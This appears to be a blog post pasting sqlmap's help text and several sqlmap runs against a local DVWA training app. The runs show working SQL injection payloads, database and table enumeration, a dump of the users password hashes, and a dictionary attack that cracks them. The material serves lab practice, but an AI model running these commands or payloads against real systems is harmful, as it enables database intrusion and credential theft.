SQL BLIND AND SQL INJECTION DVMA

Posted by 2153216126 August 01, 2013

SQL BLIND AND SQL INJECTION DVMA

SQL BLIND AND SQL INJECTION DVMA

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

Usage: python ./sqlmap.py [options]

Options:

--version show program's version number and exit

-h, --help show this help message and exit

-v VERBOSE Verbosity level: 0-6 (default 1)

Target:

At least one of these options has to be specified to set the source to

get target urls from.

-d DIRECT Direct connection to the database

-u URL, --url=URL Target url

-l LOGFILE Parse targets from Burp or WebScarab proxy logs

-m BULKFILE Scan multiple targets enlisted in a given textual file

-r REQUESTFILE Load HTTP request from a file

-g GOOGLEDORK Process Google dork results as target urls

-c CONFIGFILE Load options from a configuration INI file

Request:

These options can be used to specify how to connect to the target url.

--data=DATA Data string to be sent through POST

--cookie=COOKIE HTTP Cookie header

--cookie-urlencode URL Encode generated cookie injections

--drop-set-cookie Ignore Set-Cookie header from response

--user-agent=AGENT HTTP User-Agent header

--random-agent Use randomly selected HTTP User-Agent header

--referer=REFERER HTTP Referer header

--headers=HEADERS Extra HTTP headers newline separated

--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)

--auth-cred=ACRED HTTP authentication credentials (name:password)

--auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)

--proxy=PROXY Use a HTTP proxy to connect to the target url

--proxy-cred=PCRED HTTP proxy authentication credentials (name:password)

--ignore-proxy Ignore system default HTTP proxy

--delay=DELAY Delay in seconds between each HTTP request

--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)

--retries=RETRIES Retries when the connection timeouts (default 3)

--scope=SCOPE Regexp to filter targets from provided proxy log

--safe-url=SAFURL Url address to visit frequently during testing

--safe-freq=SAFREQ Test requests between two visits to a given safe url

Optimization:

These options can be used to optimize the performance of sqlmap.

-o Turn on all optimization switches

--predict-output Predict common queries output

--keep-alive Use persistent HTTP(s) connections

--null-connection Retrieve page length without actual HTTP response body

--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)

Injection:

These options can be used to specify which parameters to test for,

provide custom injection payloads and optional tampering scripts.

-p TESTPARAMETER Testable parameter(s)

--dbms=DBMS Force back-end DBMS to this value

--os=OS Force back-end DBMS operating system to this value

--prefix=PREFIX Injection payload prefix string

--suffix=SUFFIX Injection payload suffix string

--tamper=TAMPER Use given script(s) for tampering injection data

Detection:

These options can be used to specify how to parse and compare page

content from HTTP responses when using blind SQL injection technique.

--level=LEVEL Level of tests to perform (1-5, default 1)

--risk=RISK Risk of tests to perform (0-3, default 1)

--string=STRING String to match in page when the query is valid

--regexp=REGEXP Regexp to match in page when the query is valid

--text-only Compare pages based only on the textual content

Techniques:

These options can be used to tweak testing of specific SQL injection

techniques.

--technique=TECH SQL injection techniques to test for (default BEUST)

--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)

--union-cols=UCOLS Range of columns to test for UNION query SQL injection

--union-char=UCHAR Character to use for bruteforcing number of columns

Fingerprint:

-f, --fingerprint Perform an extensive DBMS version fingerprint

Enumeration:

These options can be used to enumerate the back-end database

management system information, structure and data contained in the

tables. Moreover you can run your own SQL statements.

-b, --banner Retrieve DBMS banner

--current-user Retrieve DBMS current user

--current-db Retrieve DBMS current database

--is-dba Detect if the DBMS current user is DBA

--users Enumerate DBMS users

--passwords Enumerate DBMS users password hashes

--privileges Enumerate DBMS users privileges

--roles Enumerate DBMS users roles

--dbs Enumerate DBMS databases

--tables Enumerate DBMS database tables

--columns Enumerate DBMS database table columns

--schema Enumerate DBMS schema

--count Retrieve number of entries for table(s)

--dump Dump DBMS database table entries

--dump-all Dump all DBMS databases tables entries

--search Search column(s), table(s) and/or database name(s)

-D DB DBMS database to enumerate

-T TBL DBMS database table to enumerate

-C COL DBMS database table column to enumerate

-U USER DBMS user to enumerate

--exclude-sysdbs Exclude DBMS system databases when enumerating tables

--start=LIMITSTART First query output entry to retrieve

--stop=LIMITSTOP Last query output entry to retrieve

--first=FIRSTCHAR First query output word character to retrieve

--last=LASTCHAR Last query output word character to retrieve

--sql-query=QUERY SQL statement to be executed

--sql-shell Prompt for an interactive SQL shell

Brute force:

These options can be used to run brute force checks.

--common-tables Check existence of common tables

--common-columns Check existence of common columns

User-defined function injection:

These options can be used to create custom user-defined functions.

--udf-inject Inject custom user-defined functions

--shared-lib=SHLIB Local path of the shared library

File system access:

These options can be used to access the back-end database management

system underlying file system.

--file-read=RFILE Read a file from the back-end DBMS file system

--file-write=WFILE Write a local file on the back-end DBMS file system

--file-dest=DFILE Back-end DBMS absolute filepath to write to

Operating system access:

These options can be used to access the back-end database management

system underlying operating system.

--os-cmd=OSCMD Execute an operating system command

--os-shell Prompt for an interactive operating system shell

--os-pwn Prompt for an out-of-band shell, meterpreter or VNC

--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC

--os-bof Stored procedure buffer overflow exploitation

--priv-esc Database process' user privilege escalation

--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed

--tmp-path=TMPPATH Remote absolute path of temporary files directory

Windows registry access:

These options can be used to access the back-end database management

system Windows registry.

--reg-read Read a Windows registry key value

--reg-add Write a Windows registry key value data

--reg-del Delete a Windows registry key value

--reg-key=REGKEY Windows registry key

--reg-value=REGVAL Windows registry key value

--reg-data=REGDATA Windows registry key value data

--reg-type=REGTYPE Windows registry key value type

General:

These options can be used to set some general working parameters.

-s SESSIONFILE Save and resume all data retrieved on a session file

-t TRAFFICFILE Log all HTTP traffic into a textual file

--batch Never ask for user input, use the default behaviour

--charset=CHARSET Force character encoding used for data retrieval

--eta Display for each output the estimated time of arrival

--flush-session Flush session file for current target

--fresh-queries Ignores query results stored in session file

--save Save options on a configuration INI file

--update Update sqlmap

Miscellaneous:

--beep Alert when sql injection found

--check-payload IDS detection testing of injection payloads

--cleanup Clean up the DBMS by sqlmap specific UDF and tables

--forms Parse and test forms on target url

--gpage=GOOGLEPAGE Use Google dork results from specified page number

--mobile Imitate smartphone through HTTP User-Agent header

--page-rank Display page rank (PR) for Google dork results

--parse-errors Parse DBMS error messages from response pages

--replicate Replicate dumped data into a sqlite3 database

--tor Use default Tor (Vidalia/Privoxy/Polipo) proxy address

--wizard Simple wizard interface for beginner users

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://localhost/index.php?id=2 --dbs

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="Cookie=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 01:45:28

[01:45:28] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:45:28] [INFO] testing connection to the target url

[01:45:28] [INFO] testing if the provided string is within the target URL page content

you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y

[01:45:30] [INFO] testing if GET parameter 'id' is dynamic

[01:45:30] [INFO] confirming that GET parameter 'id' is dynamic

[01:45:31] [INFO] GET parameter 'id' is dynamic

[01:45:31] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable

[01:45:31] [INFO] testing sql injection on GET parameter 'id'

[01:45:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[01:45:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[01:45:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[01:45:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[01:45:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[01:45:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[01:45:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[01:45:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[01:45:31] [INFO] testing 'Oracle AND time-based blind'

[01:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[01:45:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[01:45:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

[01:45:33] [WARNING] GET parameter 'id' is not injectable

[01:45:33] [INFO] testing if GET parameter 'Submit' is dynamic

[01:45:33] [WARNING] GET parameter 'Submit' appears to be not dynamic

[01:45:33] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable

[01:45:33] [INFO] testing sql injection on GET parameter 'Submit'

[01:45:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[01:45:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[01:45:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[01:45:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[01:45:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[01:45:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[01:45:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[01:45:34] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[01:45:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[01:45:34] [INFO] testing 'Oracle AND time-based blind'

[01:45:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[01:45:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[01:45:35] [WARNING] GET parameter 'Submit' is not injectable

[01:45:35] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses

[*] shutting down at: 01:45:35

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 01:46:10

[01:46:10] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:46:10] [INFO] testing connection to the target url

[01:46:10] [INFO] testing if the provided string is within the target URL page content

[01:46:13] [INFO] testing if GET parameter 'id' is dynamic

[01:46:13] [INFO] confirming that GET parameter 'id' is dynamic

[01:46:13] [INFO] GET parameter 'id' is dynamic

[01:46:13] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable

[01:46:13] [INFO] testing sql injection on GET parameter 'id'

[01:46:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[01:46:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[01:46:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[01:46:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[01:46:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[01:46:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[01:46:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[01:46:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[01:46:14] [INFO] testing 'Oracle AND time-based blind'

[01:46:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[01:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[01:46:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

[01:46:16] [WARNING] GET parameter 'id' is not injectable

[01:46:16] [INFO] testing if GET parameter 'Submit' is dynamic

[01:46:16] [WARNING] GET parameter 'Submit' appears to be not dynamic

[01:46:16] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable

[01:46:16] [INFO] testing sql injection on GET parameter 'Submit'

[01:46:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[01:46:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[01:46:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[01:46:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[01:46:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[01:46:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[01:46:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[01:46:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[01:46:17] [INFO] testing 'Oracle AND time-based blind'

[01:46:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[01:46:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[01:46:18] [WARNING] GET parameter 'Submit' is not injectable

[01:46:18] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses

[*] shutting down at: 01:46:18

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 01:46:31

[01:46:31] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:46:31] [INFO] testing connection to the target url

[01:46:31] [INFO] testing if the provided string is within the target URL page content

[01:46:31] [INFO] testing if GET parameter 'id' is dynamic

[01:46:31] [INFO] confirming that GET parameter 'id' is dynamic

[01:46:31] [INFO] GET parameter 'id' is dynamic

[01:46:32] [INFO] heuristics detected web page charset 'ascii'

[01:46:32] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)

[01:46:32] [INFO] testing sql injection on GET parameter 'id'

[01:46:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[01:46:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[01:46:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[01:46:32] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable

[01:46:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[01:46:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[01:46:42] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable

[01:46:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[01:46:42] [INFO] target url appears to be UNION injectable with 2 columns

[01:46:42] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable

GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y

[01:46:45] [INFO] testing if GET parameter 'Submit' is dynamic

[01:46:45] [WARNING] GET parameter 'Submit' appears to be not dynamic

[01:46:45] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable

[01:46:45] [INFO] testing sql injection on GET parameter 'Submit'

[01:46:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[01:46:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[01:46:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[01:46:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[01:46:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[01:46:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[01:46:49] [WARNING] GET parameter 'Submit' is not injectable

sqlmap identified the following injection points with a total of 133 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 9643=9643 AND 'KTii'='KTii&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 8718 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,120,122,58),(SELECT (CASE WHEN (8718=8718) THEN 1 ELSE 0 END)),CHAR(58,107,121,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sDog'='sDog&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,112,120,122,58),IFNULL(CAST(CHAR(71,112,86,100,86,119,116,88,106,73) AS CHAR),CHAR(32)),CHAR(58,107,121,122,58))# AND 'OaVB'='OaVB&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'nCjY'='nCjY&Submit=Submit

---

[01:46:49] [INFO] manual usage of GET payloads requires url encoding

[01:46:49] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[01:46:49] [INFO] fetching database names

available databases [4]:

[*] dvwa

[*] fbip

[*] information_schema

[*] mysql

[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:46:50

Scan DataBase in folder DVWA

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 01:46:50

[01:46:50] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:46:50] [INFO] resuming injection data from session file

[01:46:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:46:50] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[01:46:50] [INFO] manual usage of GET payloads requires url encoding

[01:46:50] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[01:46:50] [INFO] fetching tables for database: dvwa

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users |

+-----------+

[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:42:45

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users --columns

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 01:46:51

[01:46:51] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:46:51] [INFO] resuming injection data from session file

[01:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:46:51] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[00:44:35] [INFO] manual usage of GET payloads requires url encoding

[00:44:35] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[00:44:35] [INFO] fetching columns for table 'users' on database 'dvwa'

Database: dvwa

Table: users

[6 columns]

+------------+-------------+

| Column | Type |

+------------+-------------+

| first_name | varchar(15) |

| last_name | varchar(15) |

| password | varchar(32) |

| user | varchar(15) |

| user_id | int(6) |

+------------+-------------+

[00:44:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:46:53

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 01:46:53

[01:46:53 [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:46:53] [INFO] resuming injection data from session file

[01:46:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:46:53] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[01:46:53] [INFO] manual usage of GET payloads requires url encoding

[01:46:53] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y

[01:46:54] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'

[01:46:54] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y

[01:46:55] [INFO] using hash method: 'md5_generic_passwd'

what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]

[01:46:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'

do you want to use common password suffixes? (slow!) [y/N] y

[01:46:58] [INFO] starting dictionary attack (md5_generic_passwd)

[01:46:58] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'

[01:46:58] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'

[01:46:58] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'

[01:46:58] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'

Database: dvwa

Table: users

[4 entries]

+---------------------------------------------+

| password |

+---------------------------------------------+

| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |

| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |

| e99a18c428cb38d5f260853678922e03 (abc123) |

| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+---------------------------------------------+

[01:46:58] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'

[01:46:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

Search This Blog

Blog IT Tổng Hợp

SQL BLIND AND SQL INJECTION DVMA

Comments

Post a Comment

Popular Posts

HƯớng dẫn quản lý gấu khi dùng facebook (Basic)

Truy tìm IP thật của server đằng sau CloudFlare hay các dịch vụ CDN